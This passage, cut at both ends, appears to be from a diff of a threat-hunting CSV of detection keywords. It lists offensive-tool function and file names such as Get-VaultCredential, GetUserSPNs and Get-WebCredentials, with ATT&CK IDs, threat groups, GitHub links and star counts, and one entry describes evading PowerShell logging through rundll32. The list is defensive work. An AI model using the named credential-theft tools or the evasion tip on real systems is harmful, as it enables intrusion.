- T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1152","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Get-UserBadPwdCount*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-SMBAutoBrute.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-USBKeystrokes*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1152","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-UserBadPwdCount*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-SMBAutoBrute.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-UserPrivileges*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" -"*Get-UserPRTToken*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2625","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" -"*GetUserSPNs.*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*Get-UserPRTToken*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" +"*GetUserSPNs.*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "*GetUserSPNs.vbs*","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/nidem/kerberoast","1","1","N/A","N/A","10","1282","313","2022-12-31T17:17:28Z","2014-09-22T14:46:49Z" -"*Get-VaultCredential*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Get-VaultCredential*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" -"*Get-VaultCredential.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1055","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Get-VaultCreds*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" -"*Get-VolumeShadowCopy*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" -"*Get-WebCredentials*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Get-VaultCredential*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-VaultCredential*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Get-VaultCredential.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1055","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-VaultCreds*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Get-VolumeShadowCopy*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Get-WebCredentials*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" "*GetWebDAVStatus.csproj*","offensive_tool_keyword","cobaltstrike","Determine if the WebClient Service (WebDAV) is running on a remote system","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/G0ldenGunSec/GetWebDAVStatus","1","1","N/A","10","10","81","18","2021-09-29T17:40:52Z","2021-09-29T17:31:21Z" "*GetWebDAVStatus.sln*","offensive_tool_keyword","cobaltstrike","Determine if the WebClient Service (WebDAV) is running on a remote system","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/G0ldenGunSec/GetWebDAVStatus","1","1","N/A","10","10","81","18","2021-09-29T17:40:52Z","2021-09-29T17:31:21Z" "*GetWebDAVStatus_DotNet*","offensive_tool_keyword","cobaltstrike","Determine if the WebClient Service (WebDAV) is running on a remote system","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/G0ldenGunSec/GetWebDAVStatus","1","1","N/A","10","10","81","18","2021-09-29T17:40:52Z","2021-09-29T17:31:21Z" "*GetWebDAVStatus_x64.o*","offensive_tool_keyword","cobaltstrike","Determine if the WebClient Service (WebDAV) is running on a remote system","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/G0ldenGunSec/GetWebDAVStatus","1","1","N/A","10","10","81","18","2021-09-29T17:40:52Z","2021-09-29T17:31:21Z" -"*GetWhoamiCommand*","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","761","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" -"*GetWhoamiCommand.cs*","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","761","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*GetWhoamiCommand*","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*GetWhoamiCommand.cs*","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" "*GetWindowsCredentials.exe*","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","1","78","37","2023-09-28T08:36:47Z","2021-01-20T13:08:24Z" "*Get-Wlan-Keys*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - 